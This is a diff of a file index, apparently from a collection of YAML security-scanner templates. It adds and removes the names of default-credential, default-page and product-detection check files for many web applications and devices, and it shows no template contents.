./poc/default/default-centos-test-page-6827.yaml
@@ -43319,12 +43289,13 @@
./poc/default/default-codeigniter-page-6830.yaml
./poc/default/default-codeigniter-page-6831.yaml
./poc/default/default-codeigniter-page-6832.yaml
+./poc/default/default-codeigniter-page-6833.yaml
./poc/default/default-codeigniter-page-6834.yaml
./poc/default/default-config-6835.yaml
./poc/default/default-config.yaml
./poc/default/default-detect-generic-6837.yaml
-./poc/default/default-detect-generic-6838.yaml
./poc/default/default-detect-generic-6839.yaml
+./poc/default/default-detect-generic.yaml
./poc/default/default-django-page-6840.yaml
./poc/default/default-django-page-6841.yaml
./poc/default/default-django-page-6842.yaml
@@ -43347,14 +43318,15 @@
./poc/default/default-iis7-page-6859.yaml
./poc/default/default-iis7-page-6860.yaml
./poc/default/default-iis7-page-6861.yaml
+./poc/default/default-jetty-page-6862.yaml
./poc/default/default-jetty-page-6863.yaml
./poc/default/default-jetty-page-6864.yaml
./poc/default/default-jetty-page-6865.yaml
-./poc/default/default-lighttpd-page-6866.yaml
./poc/default/default-lighttpd-page-6867.yaml
./poc/default/default-lucee-page-6868.yaml
./poc/default/default-lucee-page-6869.yaml
./poc/default/default-lucee-page-6870.yaml
+./poc/default/default-lucee-page-6871.yaml
./poc/default/default-lucee-page-6872.yaml
./poc/default/default-mag-42c8a5445d70abc166f93c14f3500712.yaml
./poc/default/default-mag.yaml
@@ -43367,6 +43339,7 @@
./poc/default/default-movable-page-6878.yaml
./poc/default/default-movable-page-6879.yaml
./poc/default/default-nginx-page-6880.yaml
+./poc/default/default-nginx-page-6881.yaml
./poc/default/default-nginx-page-6882.yaml
./poc/default/default-nginx-page-6883.yaml
./poc/default/default-openresty-6884.yaml
@@ -43374,13 +43347,13 @@
./poc/default/default-openresty-6886.yaml
./poc/default/default-openresty-6887.yaml
./poc/default/default-openresty-6888.yaml
+./poc/default/default-openresty.yaml
./poc/default/default-oracle-application-page-6889.yaml
./poc/default/default-oracle-application-page-6890.yaml
./poc/default/default-oracle-application-page-6891.yaml
./poc/default/default-oracle-application-page-6892.yaml
./poc/default/default-oracle-application-page-6893.yaml
./poc/default/default-oracle-application-page.yaml
-./poc/default/default-payara-server-page-6894.yaml
./poc/default/default-payara-server-page-6895.yaml
./poc/default/default-payara-server-page-6896.yaml
./poc/default/default-payara-server-page-6897.yaml
@@ -43388,8 +43361,6 @@
./poc/default/default-plesk-page-6899.yaml
./poc/default/default-plesk-page-6900.yaml
./poc/default/default-plesk-page-6901.yaml
-./poc/default/default-plesk-page.yaml
-./poc/default/default-redhat-test-page-6902.yaml
./poc/default/default-redhat-test-page-6903.yaml
./poc/default/default-redhat-test-page-6904.yaml
./poc/default/default-redhat-test-page-6905.yaml
@@ -43407,10 +43378,10 @@
./poc/default/dell-emc-ecom-default-credentials-6917.yaml
./poc/default/dell-emc-ecom-default-credentials.yaml
./poc/default/dell-idrac-default-login-6942.yaml
-./poc/default/dell-idrac-default-login-6943.yaml
./poc/default/dell-idrac-default-login-6944.yaml
./poc/default/dell-idrac-default-login-6945.yaml
./poc/default/dell-idrac-default-login-6946.yaml
+./poc/default/dell-idrac-default-login.yaml
./poc/default/dell-idrac9-default-login-6930.yaml
./poc/default/dell-idrac9-default-login-6931.yaml
./poc/default/dell-idrac9-default-login-6932.yaml
@@ -43425,6 +43396,7 @@
./poc/default/dlink-ac-default-password.yaml
./poc/default/dlink-default-password.yaml
./poc/default/dolphinscheduler-default-login-7072.yaml
+./poc/default/dolphinscheduler-default-login-7073.yaml
./poc/default/druid-default-login-1.yaml
./poc/default/druid-default-login-2.yaml
./poc/default/druid-default-login-7095.yaml
@@ -43433,37 +43405,36 @@
./poc/default/druid-default-login.yaml
./poc/default/druid-default-password-1.yaml
./poc/default/druid-default-password-2.yaml
+./poc/default/dubbo-admin-default-login-7120.yaml
./poc/default/dubbo-admin-default-login-7121.yaml
-./poc/default/dubbo-admin-default-login.yaml
./poc/default/dubbo-admin-default-password.yaml
./poc/default/dubbo-admin-default-password.yml
./poc/default/dvwa-default-login-7126.yaml
-./poc/default/dvwa-default-login-7127.yaml
./poc/default/dvwa-default-login-7128.yaml
./poc/default/dvwa-default-login-7129.yaml
+./poc/default/dvwa-default-login.yaml
./poc/default/elasticsearch-insecure-default-config.yaml
-./poc/default/emcecom-default-login-7211.yaml
./poc/default/emcecom-default-login-7212.yaml
./poc/default/emcecom-default-login-7213.yaml
./poc/default/emcecom-default-login-7214.yaml
./poc/default/emqx-default-login-7221.yaml
+./poc/default/emqx-default-login-7222.yaml
./poc/default/emqx-default-login.yaml
./poc/default/esafenet-cdgserver3-systemconfig-default-password.yaml
./poc/default/exacqvision-default-credentials.yaml
./poc/default/exacqvision-default-login-7274.yaml
./poc/default/exacqvision-default-login-7275.yaml
./poc/default/exacqvision-default-login-7276.yaml
-./poc/default/exacqvision-default-login-7277.yaml
+./poc/default/exacqvision-default-login.yaml
./poc/default/exacqvision-default-password.yaml
./poc/default/flir-ax8-default-credentials-7512.yaml
./poc/default/flir-ax8-default-credentials.yaml
./poc/default/flir-default-login-7513.yaml
-./poc/default/flir-default-login-7514.yaml
./poc/default/flir-default-login-7515.yaml
./poc/default/flir-default-login-7516.yaml
+./poc/default/flir-default-login.yaml
./poc/default/frp-default-credentials-7555.yaml
./poc/default/frp-default-credentials.yaml
-./poc/default/frp-default-login-7556.yaml
./poc/default/frp-default-login-7557.yaml
./poc/default/frp-default-login-7558.yaml
./poc/default/frp-default-login-7559.yaml
@@ -43478,6 +43449,7 @@
./poc/default/glpi-default-login-7731.yaml
./poc/default/glpi-default-login-7732.yaml
./poc/default/glpi-default-login-7733.yaml
+./poc/default/glpi-default-login.yaml
./poc/default/gophish-default-login-7792.yaml
./poc/default/gophish-default-login-7793.yaml
./poc/default/gophish-default-login-7794.yaml
@@ -43495,14 +43467,15 @@
./poc/default/grafana-default-password.yml
./poc/default/graphite-browser-default-credential.yaml
./poc/default/guacamole-default-login-7858.yaml
+./poc/default/guacamole-default-login-7859.yaml
./poc/default/guacamole-default-login-7860.yaml
./poc/default/guacamole-default-login-7861.yaml
./poc/default/hikvision-intercom-service-default-password.yaml
./poc/default/hikvision-intercom-service-default-password.yml
./poc/default/hongdian-default-login-1.yaml
./poc/default/hongdian-default-login-2.yaml
+./poc/default/hongdian-default-login-7997.yaml
./poc/default/hongdian-default-login-7998.yaml
-./poc/default/hongdian-default-login-7999.yaml
./poc/default/hongdian-default-password-1.yaml
./poc/default/hongdian-default-password-2.yaml
./poc/default/hortonworks-smartsense-default-credentials.yaml
@@ -43511,13 +43484,10 @@
./poc/default/hp-switch-default-login-8037.yaml
./poc/default/hp-switch-default-login-8038.yaml
./poc/default/huawei-HG532e-default-login.yaml
-./poc/default/huawei-HG532e-default-router-login.yaml
./poc/default/huawei-hg532e-default-router-login-8062.yaml
./poc/default/huawei-hg532e-default-router-login-8063.yaml
./poc/default/huawei-hg532e-default-router-login-8064.yaml
./poc/default/hue-default-credential-8080.yaml
-./poc/default/hue-default-credential-8081.yaml
-./poc/default/hue-default-credential.yaml
./poc/default/ibm-dcbc-default-login.yaml
./poc/default/ibm-dcec-default-login.yaml
./poc/default/ibm-dsc-default-login.yaml
@@ -43531,36 +43501,35 @@
./poc/default/ibm-storage-default-password.yaml
./poc/default/idemia-biometrics-default-credentials.yaml
./poc/default/idemia-biometrics-default-login-8138.yaml
-./poc/default/idemia-biometrics-default-login-8139.yaml
./poc/default/idemia-biometrics-default-login-8140.yaml
-./poc/default/idemia-biometrics-default-login.yaml
+./poc/default/idemia-biometrics-default-login-8141.yaml
./poc/default/iis-default-page.yaml
./poc/default/imm-default-login.yaml
./poc/default/inspur-clusterengine-default-login-8162.yaml
./poc/default/iptime-default-login-8192.yaml
-./poc/default/iptime-default-login-8193.yaml
./poc/default/iptime-default-login-8194.yaml
./poc/default/jboss-default-password.yaml
./poc/default/jenkins-default-8270.yaml
./poc/default/jenkins-default-8271.yaml
+./poc/default/jenkins-default-8272.yaml
./poc/default/jenkins-default-8273.yaml
./poc/default/jenkins-default-login.yaml
./poc/default/jenkins-default-pwd.yaml
-./poc/default/jenkins-default.yaml
./poc/default/jinher-oa-c6-default-password.yaml
./poc/default/jinher-oa-c6-default-password.yml
./poc/default/jinher-oa-default-login-8311.yaml
+./poc/default/jinher-oa-default-login-8312.yaml
./poc/default/jira-login-default.yaml
./poc/default/jmx-default-login-8354.yaml
-./poc/default/jmx-default-login-8355.yaml
./poc/default/jmx-default-login-8356.yaml
+./poc/default/jmx-default-login.yaml
./poc/default/jmx-default-password.yaml
./poc/default/jupyterhub-default-login-8399.yaml
-./poc/default/jupyterhub-default-login-8400.yaml
./poc/default/jupyterhub-default-login-8401.yaml
./poc/default/kafka-center-default-login-8415.yaml
./poc/default/kafka-center-default-login-8416.yaml
./poc/default/kafka-center-default-login-8417.yaml
+./poc/default/kafka-center-default-login.yaml
./poc/default/kafka-center-default-password.yaml
./poc/default/kingsoft-v8-default-password.yaml
./poc/default/kingsoft-v8-default-password.yml
@@ -43569,9 +43538,9 @@
./poc/default/lighttpd-default-8628.yaml
./poc/default/lighttpd-default.yaml
./poc/default/lutron-iot-default-login-8674.yaml
+./poc/default/lutron-iot-default-login-8675.yaml
./poc/default/lutron-iot-default-login-8676.yaml
./poc/default/lutron-iot-default-login-8677.yaml
-./poc/default/lutron-iot-default-login-8678.yaml
./poc/default/lutron-iot-default-login.yaml
./poc/default/mantisbt-default-credential-8778.yaml
./poc/default/mantisbt-default-credential-8779.yaml
@@ -43595,15 +43564,15 @@
./poc/default/nacos-default-password.yaml
./poc/default/nagios-default-credential-8989.yaml
./poc/default/nagios-default-credential.yaml
+./poc/default/nagios-default-login-8990.yaml
./poc/default/nagios-default-login-8991.yaml
./poc/default/nagios-default-login-8992.yaml
./poc/default/nagios-default-login-8993.yaml
-./poc/default/nagios-default-login-8994.yaml
./poc/default/netentsec-icg-default-password.yaml
./poc/default/netentsec-icg-default-password.yml
./poc/default/netsus-default-login-9058.yaml
./poc/default/netsus-default-login-9059.yaml
-./poc/default/netsus-default-login-9060.yaml
+./poc/default/netsus-default-login.yaml
./poc/default/nexus-default-login-9086.yaml
./poc/default/nexus-default-login-9087.yaml
./poc/default/nexus-default-login-9088.yaml
@@ -43614,32 +43583,28 @@
./poc/default/nps-default-login-9142.yaml
./poc/default/nps-default-login-9143.yaml
./poc/default/nps-default-login-9144.yaml
-./poc/default/nps-default-login-9145.yaml
./poc/default/nps-default-password-9147.yaml
./poc/default/nps-default-password.yaml
./poc/default/nps-default-password.yml
./poc/default/ns-icg-default-password.yaml
./poc/default/nsicg-default-password.yaml
./poc/default/o2-default-password.yaml
-./poc/default/octobercms-default-login-9192.yaml
./poc/default/octobercms-default-login-9193.yaml
+./poc/default/octobercms-default-login.yaml
./poc/default/ofbiz-default-credentials-9207.yaml
./poc/default/ofbiz-default-credentials.yaml
./poc/default/ofbiz-default-login-9208.yaml
./poc/default/ofbiz-default-login-9209.yaml
-./poc/default/ofbiz-default-login-9210.yaml
./poc/default/ofbiz-default-login-9211.yaml
./poc/default/ofbiz-default-password.yaml
./poc/default/openemr-default-login-9270.yaml
-./poc/default/openemr-default-login.yaml
./poc/default/openerp-default-password.yaml
./poc/default/openwrt-default-login-9332.yaml
./poc/default/openwrt-default-login.yaml
./poc/default/operations-automation-default-page-9336.yaml
-./poc/default/operations-automation-default-page-9337.yaml
./poc/default/operations-automation-default-page-9338.yaml
+./poc/default/operations-automation-default-page-9339.yaml
./poc/default/operations-automation-default-page-9340.yaml
-./poc/default/operations-automation-default-page.yaml
./poc/default/oracle-bi-default-credentials.yaml
./poc/default/panabit-default-login-9437.yaml
./poc/default/panabit-default-login-9438.yaml
@@ -43651,15 +43616,18 @@
./poc/default/panabit-gateway-default-password.yaml
./poc/default/panabit-gateway-default-password.yml
./poc/default/panabit-ixcache-default-login-9443.yaml
+./poc/default/panabit-ixcache-default-login.yaml
./poc/default/panabit-ixcache-default-password.yaml
./poc/default/panabit-ixcache-default-password.yml
./poc/default/panos-default-credentials.yaml
./poc/default/panos-default-login-9454.yaml
+./poc/default/panos-default-login-9455.yaml
./poc/default/panos-default-login-9456.yaml
./poc/default/panos-default-login-9457.yaml
+./poc/default/panos-default-login.yaml
./poc/default/pentaho-default-login-9477.yaml
-./poc/default/pentaho-default-login-9478.yaml
./poc/default/pentaho-default-login-9479.yaml
+./poc/default/pentaho-default-login-9480.yaml
./poc/default/pentaho-default-login.yaml
./poc/default/peoplesoft-default-login.yaml
./poc/default/pgsql-default-db.yaml
@@ -43667,8 +43635,8 @@
./poc/default/phpmyadmin-default-page.yaml
./poc/default/poc-yaml-otter-default-password.yaml
./poc/default/postgres-default-logins.yaml
+./poc/default/rabbitmq-default-admin-9780.yaml
./poc/default/rabbitmq-default-admin-9781.yaml
-./poc/default/rabbitmq-default-admin-9782.yaml
./poc/default/rabbitmq-default-admin.yaml
./poc/default/rabbitmq-default-login-9783.yaml
./poc/default/rabbitmq-default-login-9784.yaml
@@ -43679,15 +43647,18 @@
./poc/default/rainloop-default-login-9811.yaml
./poc/default/rainloop-default-login-9812.yaml
./poc/default/rainloop-default-login-9813.yaml
+./poc/default/rainloop-default-login.yaml
./poc/default/rancher-default-login-9814.yaml
./poc/default/rancher-default-login-9815.yaml
./poc/default/rancher-default-login-9816.yaml
./poc/default/rancher-default-password.yaml
+./poc/default/ranger-default-login-9827.yaml
./poc/default/ranger-default-login-9828.yaml
./poc/default/redfish-bmc-default-login.yaml
./poc/default/redis-default-logins.yaml
./poc/default/rockmongo-default-credentials-9896.yaml
./poc/default/rockmongo-default-credentials.yaml
+./poc/default/rockmongo-default-login-9897.yaml
./poc/default/rockmongo-default-login-9898.yaml
./poc/default/rockmongo-default-login-9899.yaml
./poc/default/rockmongo-default-login-9900.yaml
@@ -43705,6 +43676,7 @@
./poc/default/samsung-wlan-default-login-10015.yaml
./poc/default/samsung-wlan-default-login-10016.yaml
./poc/default/samsung-wlan-default-login-10017.yaml
+./poc/default/samsung-wlan-default-login-10018.yaml
./poc/default/secnet-ac-default-login-10113.yaml
./poc/default/secnet-ac-default-login.yaml
./poc/default/secnet-ac-default-password.yaml
@@ -43751,17 +43723,19 @@
./poc/default/stackstorm-default-login.yaml
./poc/default/structurizr-default-login.yaml
./poc/default/supermicro-default-login-10572.yaml
+./poc/default/supermicro-default-login.yaml
./poc/default/superset-default-login-10573.yaml
./poc/default/superset-default-login-10574.yaml
./poc/default/superset-default-login.yaml
./poc/default/szhe-default-login-10635.yaml
./poc/default/szhe-default-login-10636.yaml
./poc/default/szhe-default-login-10637.yaml
-./poc/default/szhe-default-login.yaml
+./poc/default/szhe-default-login-10638.yaml
./poc/default/szhe-default-password-10639.yaml
./poc/default/szhe-default-password-10640.yaml
./poc/default/szhe-default-password.yaml
./poc/default/telecom-gateway-default-login-10686.yaml
+./poc/default/telecom-gateway-default-login.yaml
./poc/default/telecom-gateway-default-password.yaml
./poc/default/telecom-gateway-default-password.yml
./poc/default/timekeeper-default-login.yaml
@@ -43770,6 +43744,7 @@
./poc/default/tomcat-default-login-10789.yaml
./poc/default/tomcat-default-login-10790.yaml
./poc/default/tomcat-default-login-10791.yaml
+./poc/default/tomcat-default-login.yaml
./poc/default/tomcat-default-manager.yaml
./poc/default/tomcat-manager-default-1.yaml
./poc/default/tomcat-manager-default-10.yaml
@@ -43790,15 +43765,15 @@
./poc/default/tomcat-manager-default-creds.yaml
./poc/default/tomcat-manager-default.yaml
./poc/default/tplink-r470gp-default-login.yaml
-./poc/default/trilithic-viewpoint-default-10835.yaml
./poc/default/trilithic-viewpoint-default-10836.yaml
./poc/default/trilithic-viewpoint-default-password.yaml
./poc/default/trilithic-viewpoint-default.yaml
./poc/default/tyan-megarac-sp-default-login.yaml
./poc/default/tyan-rmm-bmc-default-login.yaml
./poc/default/ucmdb-default-login-10868.yaml
-./poc/default/ucmdb-default-login-10869.yaml
./poc/default/ucmdb-default-login-10870.yaml
+./poc/default/ucmdb-default-login-10871.yaml
+./poc/default/ucmdb-default-login.yaml
./poc/default/utt-default-password.yaml
./poc/default/versa-default-login-11002.yaml
./poc/default/versa-default-login-11003.yaml
@@ -43806,9 +43781,9 @@
./poc/default/versa-default-password.yaml
./poc/default/versa-flexvnf-ui-default-login.yaml
./poc/default/vidyo-default-login-11008.yaml
-./poc/default/vidyo-default-login-11009.yaml
-./poc/default/vidyo-default-login.yaml
+./poc/default/vidyo-default-login-11010.yaml
./poc/default/visionhub-default-credentials.yaml
+./poc/default/visionhub-default-login-11026.yaml
./poc/default/visionhub-default-login-11027.yaml
./poc/default/visionhub-default-login-11028.yaml
./poc/default/visionhub-default-login-11029.yaml
@@ -43823,7 +43798,6 @@
./poc/default/wifisky-default-login-11203.yaml
./poc/default/wifisky-default-login-11204.yaml
./poc/default/wifisky-default-login.yaml
-./poc/default/wifisky-default-password-11205.yaml
./poc/default/wifisky-default-password-11206.yaml
./poc/default/wifisky-default-password-cnvd-2021-39012.yml
./poc/default/wifisky-default-password.yaml
@@ -43832,18 +43806,16 @@
./poc/default/wso2-default-login-11640.yaml
./poc/default/wso2-default-login-11641.yaml
./poc/default/wso2-default-login-11642.yaml
-./poc/default/wso2-default-login.yaml
./poc/default/wso2-default-password.yaml
./poc/default/xampp-default-page-11660.yaml
-./poc/default/xampp-default-page-11661.yaml
+./poc/default/xampp-default-page-11662.yaml
./poc/default/xampp-default-page-11663.yaml
-./poc/default/xampp-default-page.yaml
./poc/default/xerox-workcentre7-default-password.yaml
./poc/default/xerox7-default-login-11678.yaml
./poc/default/xerox7-default-login-11679.yaml
./poc/default/xerox7-default-login-11680.yaml
+./poc/default/xerox7-default-login.yaml
./poc/default/xerox7-default-password.yaml
-./poc/default/xxljob-default-login-11709.yaml
./poc/default/xxljob-default-login-11710.yaml
./poc/default/xxljob-default-login-11711.yaml
./poc/default/xxljob-default-login-11712.yaml
@@ -43871,13 +43843,14 @@
./poc/detect/NagiosXI-CMS-Detect.yaml
./poc/detect/PFSense-Detect.yaml
./poc/detect/PRTGNetwork-Detect.yaml
+./poc/detect/RedMine-Detect.yaml
./poc/detect/TestLink-Detect.yaml
./poc/detect/Tomcat-Path-normalize-detect.yaml
./poc/detect/Unifi-Detect.yaml
./poc/detect/ZoneMinder-Tech-Detect.yaml
./poc/detect/achecker-detect.yaml
./poc/detect/acontent-detect-31.yaml
-./poc/detect/acontent-detect-32.yaml
+./poc/detect/acontent-detect.yaml
./poc/detect/activemq-openwire-transport-detect.yaml
./poc/detect/ad-blocking-detector-29a2fe62a95c9b7d06f91cd4f479a678.yaml
./poc/detect/ad-blocking-detector.yaml
@@ -43885,8 +43858,8 @@
./poc/detect/adbhoney-detection-shell.yaml
./poc/detect/adbhoney-honeypot-cnxn-detect.yaml
./poc/detect/adbhoney-honeypot-shell-detect.yaml
+./poc/detect/addeventlistener-detect-64.yaml
./poc/detect/addeventlistener-detect-65.yaml
-./poc/detect/addeventlistener-detect-66.yaml
./poc/detect/addeventlistener-detect.yaml
./poc/detect/adminer-panel-detect.yaml
./poc/detect/admiralcloud-detect.yaml
@@ -43896,7 +43869,6 @@
./poc/detect/adobe-coldfusion-detect-4.yaml
./poc/detect/adobe-coldfusion-detect-5.yaml
./poc/detect/adobe-coldfusion-detect-6.yaml
-./poc/detect/adobe-coldfusion-detect-82.yaml
./poc/detect/adobe-coldfusion-detect-83.yaml
./poc/detect/adobe-coldfusion-detect-84.yaml
./poc/detect/adobe-coldfusion-detector-1.yaml
@@ -43907,8 +43879,9 @@
./poc/detect/adobe-coldfusion-detector-6.yaml
./poc/detect/adobe-coldfusion-detector-error.yaml
./poc/detect/adobe-coldfusion-error-detect-85.yaml
+./poc/detect/adobe-coldfusion-error-detect-86.yaml
./poc/detect/adobe-coldfusion-error-detect-87.yaml
-./poc/detect/adobe-coldfusion-error-detect-88.yaml
+./poc/detect/adobe-coldfusion-error-detect.yaml
./poc/detect/adselfservice-version-detect.yaml
./poc/detect/aem-detection-143.yaml
./poc/detect/aem-detection-144.yaml
@@ -43916,36 +43889,38 @@
./poc/detect/aem-detection.yaml
./poc/detect/airflow-detect-237.yaml
./poc/detect/airflow-detect-238.yaml
-./poc/detect/airflow-detect-239.yaml
+./poc/detect/airflow-detect-240.yaml
./poc/detect/aix-websm-detect.yaml
./poc/detect/alfresco-detect-258.yaml
-./poc/detect/alfresco-detect-259.yaml
+./poc/detect/alfresco-detect-260.yaml
./poc/detect/alfresco-detect.yaml
./poc/detect/amazon-mws-auth-token-detect.yaml
./poc/detect/amazon-sns-topic-disclosure-detect.yaml
./poc/detect/apache-activemq-detect.yaml
+./poc/detect/apache-answer-detect.yaml
./poc/detect/apache-axis-detect-1.yaml
./poc/detect/apache-axis-detect-2.yaml
./poc/detect/apache-axis-detect-3.yaml
+./poc/detect/apache-axis-detect-339.yaml
./poc/detect/apache-axis-detect-340.yaml
-./poc/detect/apache-axis-detect.yaml
-./poc/detect/apache-cocoon-detect-342.yaml
+./poc/detect/apache-axis-detect-341.yaml
+./poc/detect/apache-cocoon-detect.yaml
./poc/detect/apache-detect-345.yaml
+./poc/detect/apache-detect-346.yaml
./poc/detect/apache-detect-347.yaml
./poc/detect/apache-detect-348.yaml
./poc/detect/apache-detect-349.yaml
-./poc/detect/apache-detect.yaml
./poc/detect/apache-druid-detect.yaml
./poc/detect/apache-dubbo-detect.yaml
./poc/detect/apc-detect.yaml
-./poc/detect/apollo-server-detect-522.yaml
+./poc/detect/apollo-server-detect-523.yaml
+./poc/detect/apollo-server-detect.yaml
./poc/detect/aptus-detect.yaml
./poc/detect/argocd-detect.yaml
./poc/detect/arris-modem-detect.yaml
-./poc/detect/artica-web-proxy-detect-543.yaml
./poc/detect/artica-web-proxy-detect-544.yaml
-./poc/detect/artica-web-proxy-detect-545.yaml
./poc/detect/artica-web-proxy-detect-546.yaml
+./poc/detect/artica-web-proxy-detect.yaml
./poc/detect/artifactory-version-detect.yaml
./poc/detect/aspnet-version-detect.yaml
./poc/detect/atlantis-detect.yaml
@@ -43953,11 +43928,10 @@
./poc/detect/audiocodes-detect.yaml
./poc/detect/autobahn-python-detect-592.yaml
./poc/detect/autobahn-python-detect-593.yaml
-./poc/detect/autobahn-python-detect-595.yaml
+./poc/detect/autobahn-python-detect-594.yaml
./poc/detect/autoset-detect.yaml
./poc/detect/avantfax-detect-598.yaml
./poc/detect/avantfax-detect-599.yaml
-./poc/detect/avantfax-detect-600.yaml
./poc/detect/avantfax-detect.yaml
./poc/detect/aviatrix-detect-606.yaml
./poc/detect/aviatrix-detect-607.yaml
@@ -43966,7 +43940,6 @@
./poc/detect/aws-elastic-beanstalk-detect-642.yaml
./poc/detect/aws-elastic-beanstalk-detect-643.yaml
./poc/detect/aws-elastic-beanstalk-detect-644.yaml
-./poc/detect/aws-elastic-beanstalk-detect.yaml
./poc/detect/aws-sftp-detect.yaml
./poc/detect/axigen-mail-server-detect.yaml
./poc/detect/axis-detect.yaml
@@ -43976,8 +43949,8 @@
./poc/detect/azure-takeover-detection-683.yaml
./poc/detect/azure-takeover-detection.yaml
./poc/detect/basic-auth-detect.yaml
-./poc/detect/basic-auth-detection-687.yaml
./poc/detect/basic-auth-detection-688.yaml
+./poc/detect/basic-auth-detection-689.yaml
./poc/detect/basic-auth-detection-691.yaml
./poc/detect/basic-auth-detection.yaml
./poc/detect/bedita-detect-704.yaml
@@ -43985,11 +43958,13 @@
./poc/detect/bedita-detect.yaml
./poc/detect/bgp-detect.yaml
./poc/detect/bigbluebutton-detect-722.yaml
-./poc/detect/bigbluebutton-detect-723.yaml
+./poc/detect/bigbluebutton-detect.yaml
./poc/detect/bigip-config-utility-detect-1.yaml
./poc/detect/bigip-config-utility-detect-2.yaml
./poc/detect/bigip-config-utility-detect-3.yaml
+./poc/detect/bigip-config-utility-detect-730.yaml
./poc/detect/bigip-config-utility-detect-731.yaml
+./poc/detect/bigip-config-utility-detect-732.yaml
./poc/detect/bigip-config-utility-detect.yaml
./poc/detect/bigip-detection-734.yaml
./poc/detect/bigip-detection.yaml
@@ -44012,23 +43987,20 @@
./poc/detect/brother-printer-detect-790.yaml
./poc/detect/brother-printer-detect.yaml
./poc/detect/burp-api-detect-809.yaml
-./poc/detect/burp-api-detect-812.yaml
+./poc/detect/burp-api-detect-810.yaml
./poc/detect/burp-api-detect-813.yaml
./poc/detect/burp-api-detect.yaml
./poc/detect/cacti-detect-1.yaml
./poc/detect/cacti-detect-2.yaml
-./poc/detect/cacti-detect-826.yaml
./poc/detect/cacti-detect.yaml
./poc/detect/carestream-vue-detect-1.yaml
./poc/detect/carestream-vue-detect-2.yaml
./poc/detect/carestream-vue-detect-859.yaml
./poc/detect/carestream-vue-detect-860.yaml
-./poc/detect/carestream-vue-detect-861.yaml
./poc/detect/ccm-detect.yaml
./poc/detect/celebrus-detect.yaml
./poc/detect/centreon-detect-875.yaml
./poc/detect/centreon-detect-876.yaml
-./poc/detect/centreon-detect-877.yaml
./poc/detect/centreon-detect.yaml
./poc/detect/changedetection-panel.yaml
./poc/detect/chatgpt-next-detection.yaml
@@ -44047,15 +44019,14 @@
./poc/detect/cisco-webvpn-detect.yaml
./poc/detect/citrix-adc-gateway-detect-1.yaml
./poc/detect/citrix-adc-gateway-detect-2.yaml
-./poc/detect/citrix-adc-gateway-detect-981.yaml
./poc/detect/citrix-adc-gateway-detect-982.yaml
+./poc/detect/citrix-adc-gateway-detect-983.yaml
./poc/detect/citrix-adc-gateway-detect.yaml
./poc/detect/citrix-honeypot-detect.yaml
./poc/detect/citrix-honeypot-detection.yaml
./poc/detect/citrix-netscaler-gateway-detect.yml
./poc/detect/citrix-vpn-detect-985.yaml
./poc/detect/citrix-vpn-detect-986.yaml
-./poc/detect/citrix-vpn-detect-987.yaml
./poc/detect/citrix-vpn-detect.yaml
./poc/detect/clamav-detect.yaml
./poc/detect/clickhouse-db-detect.yaml
@@ -44064,19 +44035,18 @@
./poc/detect/cms-detect.yaml
./poc/detect/cname-service-detection-1032.yaml
./poc/detect/cname-service-detection.yaml
-./poc/detect/cname-service-detector-1034.yaml
./poc/detect/cname-service-detector.yaml
./poc/detect/cobbler-version-detect.yaml
./poc/detect/cockpit-detect-1125.yaml
-./poc/detect/cockpit-detect-1127.yaml
+./poc/detect/cockpit-detect-1126.yaml
./poc/detect/cockpit-detect-1128.yaml
./poc/detect/cofense-vision-detection.yaml
./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml
./poc/detect/comprehensive-swagger-ui-version-detection.yaml
./poc/detect/confluence-detect-1.yaml
./poc/detect/confluence-detect-1186.yaml
-./poc/detect/confluence-detect-1187.yaml
./poc/detect/confluence-detect-1188.yaml
+./poc/detect/confluence-detect-1189.yaml
./poc/detect/confluence-detect-2.yaml
./poc/detect/confluence-detect-3.yaml
./poc/detect/confluence-detect-4.yaml
@@ -44094,14 +44064,14 @@
./poc/detect/cql-native-transport-detect.yaml
./poc/detect/craft-cms-detect-1246.yaml
./poc/detect/craft-cms-detect-1247.yaml
-./poc/detect/craft-cms-detect.yaml
./poc/detect/craftercms-detect.yaml
./poc/detect/create-mysql-detection.yaml
./poc/detect/crush-ftp-detect-1270.yaml
./poc/detect/crush-ftp-detect-1271.yaml
+./poc/detect/crush-ftp-detect-1272.yaml
./poc/detect/crush-ftp-detect.yaml
-./poc/detect/csrfguard-detect-1290.yaml
./poc/detect/csrfguard-detect-1291.yaml
+./poc/detect/csrfguard-detect.yaml
./poc/detect/ctcms-detect.yaml
./poc/detect/cucm-detect.yaml
./poc/detect/custom-aem-ACPV-detect.yaml
@@ -44111,6 +44081,7 @@
./poc/detect/custom-connection-server-detect.yaml
./poc/detect/custom-ctc-panel-detect.yaml
./poc/detect/custom-data-alert-engine-service-detect.yaml
+./poc/detect/custom-data-result-service-detect.yaml
./poc/detect/custom-datadump-source-code-detect.yaml
./poc/detect/custom-dom-xss-detect.yaml
./poc/detect/custom-dot-git-detect.yaml
@@ -44144,8 +44115,8 @@
./poc/detect/defaced-website-detect.yaml
./poc/detect/defacement-detect.yaml
./poc/detect/default-detect-generic-6837.yaml
-./poc/detect/default-detect-generic-6838.yaml
./poc/detect/default-detect-generic-6839.yaml
+./poc/detect/default-detect-generic.yaml
./poc/detect/dell-bmc-panel-detect.yaml
./poc/detect/dell-idrac6-detect-6918.yaml
./poc/detect/dell-idrac6-detect-6919.yaml
@@ -44155,10 +44126,12 @@
./poc/detect/dell-idrac7-detect-6923.yaml
./poc/detect/dell-idrac7-detect-6924.yaml
./poc/detect/dell-idrac7-detect-6925.yaml
+./poc/detect/dell-idrac7-detect.yaml
./poc/detect/dell-idrac8-detect-6926.yaml
./poc/detect/dell-idrac8-detect-6928.yaml
./poc/detect/dell-idrac8-detect-6929.yaml
./poc/detect/dell-idrac9-detect-6936.yaml
+./poc/detect/dell-idrac9-detect-6937.yaml
./poc/detect/dell-idrac9-detect-6938.yaml
./poc/detect/dell-idrac9-detect-6940.yaml
./poc/detect/dell-idrac9-detect-6941.yaml
@@ -44171,17 +44144,19 @@
./poc/detect/detect-all-takeovers.yaml
./poc/detect/detect-all-takovers.yaml
./poc/detect/detect-dangling-cname-6966.yaml
+./poc/detect/detect-dangling-cname-6967.yaml
./poc/detect/detect-dangling-cname-6968.yaml
./poc/detect/detect-dns-over-https-6969.yaml
./poc/detect/detect-dns-over-https.yaml
./poc/detect/detect-drone-config-6971.yaml
./poc/detect/detect-drone-config-6972.yaml
+./poc/detect/detect-drone-config-6973.yaml
./poc/detect/detect-drone.yaml
./poc/detect/detect-generic-website.yaml
./poc/detect/detect-jabber-xmpp-6974.yaml
./poc/detect/detect-jabber-xmpp-6975.yaml
./poc/detect/detect-jabber-xmpp.yaml
-./poc/detect/detect-options-method-6978.yaml
